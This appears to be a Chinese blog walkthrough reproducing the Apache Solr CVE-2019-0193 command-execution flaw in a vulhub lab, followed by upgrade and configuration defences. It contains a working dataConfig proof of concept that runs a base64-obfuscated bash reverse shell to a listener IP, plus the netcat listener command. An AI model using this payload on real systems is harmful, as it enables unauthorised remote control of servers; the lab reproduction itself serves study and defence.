CVE-2019-0193 Apache Solr 远程命令执行反弹shell

最新推荐文章于 2024-08-20 00:20:31 发布
置顶 最新推荐文章于 2024-08-20 00:20:31 发布
阅读量1.2k 收藏 3
点赞数 3
分类专栏: 漏洞专栏 文章标签: apache solr
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Trouble_99/article/details/114122065
版权

目录

漏洞描述

Apache Solr是一个开源的搜索服务器。Solr使用Java语言开发,该漏洞产生的主要原因是因为apache dataimporthandler数据外部收集的一个端口模块,该模块支持从远程的地址进行通信,并多数据进行收集,正因为开放了远程地址,可导致攻击者构造恶意的代码对DIH进行脚本注入,从而让后端服务器对恶意代码进行了执行,该漏洞可导致服务器被攻击

影响版本

Apache Solr < 8.2.0

漏洞复现

环境搭建

小编这里图个方便直接使用vulhub靶场搭建环境

cd /root/vulhub/solr/CVE-2019-0193
docker-compose up -d
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db   
//创建一个test模块
docker ps

在这里插入图片描述web访问如下:
在这里插入图片描述

反弹shell

1.访问web页面进行如下操作
test -》 Dataimport -》 Debug -》 Debug-Mode
在这里插入图片描述2.开启端口监听
kali中使用,也可windows下使用。

nc -lnvp 1234

在这里插入图片描述

3.添加poc

<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
          function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTExLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}");
          }
  ]]></script>
  <document>
    <entity name="stackoverflow"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:poc" />
  </document>
</dataConfig>

注意这里加密的base64为你当前反弹的ip和端口,可以自行进行加密修改。 附链接: base64编码

在这里插入图片描述

在这里插入图片描述发送成功后,成功反弹shell,因为拿到的是solr权限,后续步骤可以视情况进行提权等操作。
在这里插入图片描述

防御方法

  • 登录solr的控制面板,可以查看到当前的版本,如果低于8.2.0,说明存在漏洞,将solr的版本升级到最新版本。
  • 对apache配置文件进行修改,文件名是solrconfig.xml,配置文件里的datainport值都注释掉,关闭这个数据收集功能,有些网站,APP可能会使用到这个功能,在关闭后请检查网站的正常功能,是否收到影响,没有影响就关闭即可。
pikeboom
关注
专栏目录
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558)
qq_51577576的博客
12-09 599
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558) Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离。 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。
Apache Solr 远程命令执行 Via Velocity Custom Template (CVE-2019-17558)
千寻的博客
03-23 1419
* 可借助自定义的`Velocity`模板功能,利用`Velocity-SSTI`漏洞在`Solr系统`上执行任意代码。 * 可借助`Velocity`模板利用该漏洞在系统上执行任意代码。
Apache Solr远程代码执行漏洞 (CVE-2019-0193
玄道的网安博客
06-25 1045
前言 Apache Solr官方发布Apache Solr存在一个远程代码执行漏洞(CVE-2019-0193),攻击者可利用dataConfig参数构造恶意请求,导致执行任意代码 影响版本 Apache Solr < 8.2.0 环境搭建 切换到solr目录 cd vulhub/solr/CVE-2019-0193 docker-compose up -d docker-compose exec solr bash bin/solr create_core -c test -d
Apache Solr 初级教程(介绍、安装部署、Java接口、中文分词)
08-26 1861
Apache Solr 介绍 Solr 是什么?   Solr 是一个开源的企业级搜索服务器,底层使用易于扩展和修改的Java 来实现。服务器通信使用标准的HTTP 和XML,所以如果使用Solr 了解Java 技术会有用却不是必须的要求。   Solr 主要特性有:强大的
Solr 教程(一)
最新发布
龙哥盟
08-20 1379
搜索无处不在,已经成为我们数字生活的一部分!你打开浏览器,很有可能你的主页是你首选的搜索引擎。你智能手机的搜索引擎只是轻轻一扫。打开一个电子商务网站,搜索框就出现在页面的中央或顶部。基本上,每个需要公开数据的门户都需要一个搜索引擎。这证明了一个搜索引擎对于一个企业或者它正在构建的产品是多么的重要。当今的企业有大量的信息要公开,而且这一数量还将继续增长。浏览所有数据以找到相关信息几乎是不可能的,也是乏味的。这个问题的唯一解决方案是搜索引擎。
Apache Solr 介绍(1)
weixin_34102807的博客
09-15 135
导言 说起Apache Lucene,可以说无人不知,无人不晓,但是说道Apache Solr,恐怕知道的不多。看看Apache Solr的说明: Solr是一个基于Lucene java库的企业级搜索服务器,包含XML/HTTP,JSON API, 高亮查询结果,faceted search(不知道该如何翻译,片段式搜索),缓存,复制还有一个WEB管理界面。Solr运行在Servlet容...
Apache Solr 远程命令执行漏洞 CVE-2019-0193 漏洞复现
ADummy的博客
02-28 508
Apache Solr 远程命令执行漏洞(CVE-2019-0193) by ADummy 0x00利用路线 ​ 创建核心—>选择debug模式—>写入exp—>命令执行 0x01漏洞介绍 ​ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能
Apache Solr 远程命令执行漏洞(CVE-2019-0193
EC_Carrot的博客
07-30 184
漏洞简介 Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 Apache Solr 8.2.0之前版本中存在授权问题漏洞。攻击者可利用该漏洞在目标服务器上执行恶意代码。 漏洞复现 环境启动后,我们需要创建一个核心: docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db
Apache Solr 远程命令执行漏洞(CVE-2017-12629)
weixin_45022281的博客
10-13 2562
Apache Solr 远程命令执行漏洞(CVE-2017-12629) 漏洞描述: 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。 风险
Apache Solr远程代码执行漏洞 (CVE-2019-0193)复现操作
weixin_45983744的博客
12-11 661
QQ交流学习群:811401950 一. 漏洞描述 2019年11月16日,Apache官方发布Apache Solr远程代码执行漏洞(CVE-2019-0193)安全通告,此漏洞存在于可选模块DataImportHandler 中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请求的dataConfig参 数来设置,由于DIH配置...
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
weixin_44047654的博客
03-03 1742
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
apache solr远程代码执行漏洞(cve-2019-0193)
whatday的专栏
06-25 5440
简介 Apache Solr是一个企业级搜索平台,用Java编写且开源,基于Apache Lucene项目。 主要功能包括: full-text search 全文搜索 hit highlighting faceted search dynamic clustering 动态聚类 document parsing 文档解析 Solr可以像数据库一样被使用: 1.运行服务器,创建collection1 2.从外部获取数据 - 向collection1发送不同类型的数据(例如文本
03Apache Solr 远程命令执行漏洞(CVE-2019-0193
千寻的博客
03-23 1850
此次漏洞出现在`Apache Solr`的`DataImportHandler`,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的`DIH配置都可以通过外部请求的dataConfig参数`来设置。 * 由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行
Apache Solr 远程命令执行漏洞复现(CVE-2019-0193
Heytoo的博客
06-29 835
Apache Solr 远程命令执行漏洞复现(CVE-2019-0193) 0x00 简介 Solr的目标用户:“需要搜索框、分面浏览(导航)或者两者结合的任何人”。 Solr的关键特性包括: 基于标准的开放接口——Solr搜索服务器支持通过XML、JSON和HTTP查询和获取结果。 易管理——Solr可以通过HTML页面管理,服务器统计数据以JMX输出,Solr配置通过XML完成。 分面浏览——搜索结果自动分类。 突出显示命中词——匹配的字符自动在搜索结果中...
Apache Solr命令执行漏洞复现【CVE-2019-0193
isxiaole的博客
01-26 390
Solr简介 Apache Solr是一个企业级搜索平台,用Java编写且开源,基于Apache Lucene项目。 主要功能包括: full-text search 全文搜索 hit highlighting faceted search dynamic clustering 动态聚类 document parsing 文档解析 Solr可以像数据库一样被使用: 运行服务器,创建collection1 从外部获取数据 - 向collection1发送不同类型的数据(例如文本,x
CVE-2019-0193Apache Solr远程命令执行漏洞复现
nex1less的博客
11-26 747
0x01 漏洞描述 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重 0x02 漏洞环境 1.服务器需要安装java环境: https://jingyan.baidu.com/article/375c8e190c1f9525f2a22931.html 2.服务器需要安装curl环境: (1)下载curl包:https...
apache solr
发展是曲折的但也是前进的
07-22 1090
Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。Apache Solr 中存储的资源是以 Document 为对象进行存储的。每个文档由一系列的 Field 构成,每个 Field 表示资源的一个属性。Solr 中的每个 Document 需要有能唯一标识其自身的属性,默认情况下这个属性的名字是 id,在
CVE-2019-19781 Citrix漏洞:远程代码执行详解与检测
"本文将深入探讨CVE-2019-19781漏洞,该漏洞影响了Citrix Application Delivery Controller(ADC)和Citrix Gateway,可能导致远程代码执行(RCE)。我们将分析漏洞的成因、检测方法以及利用示例,帮助读者了解其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值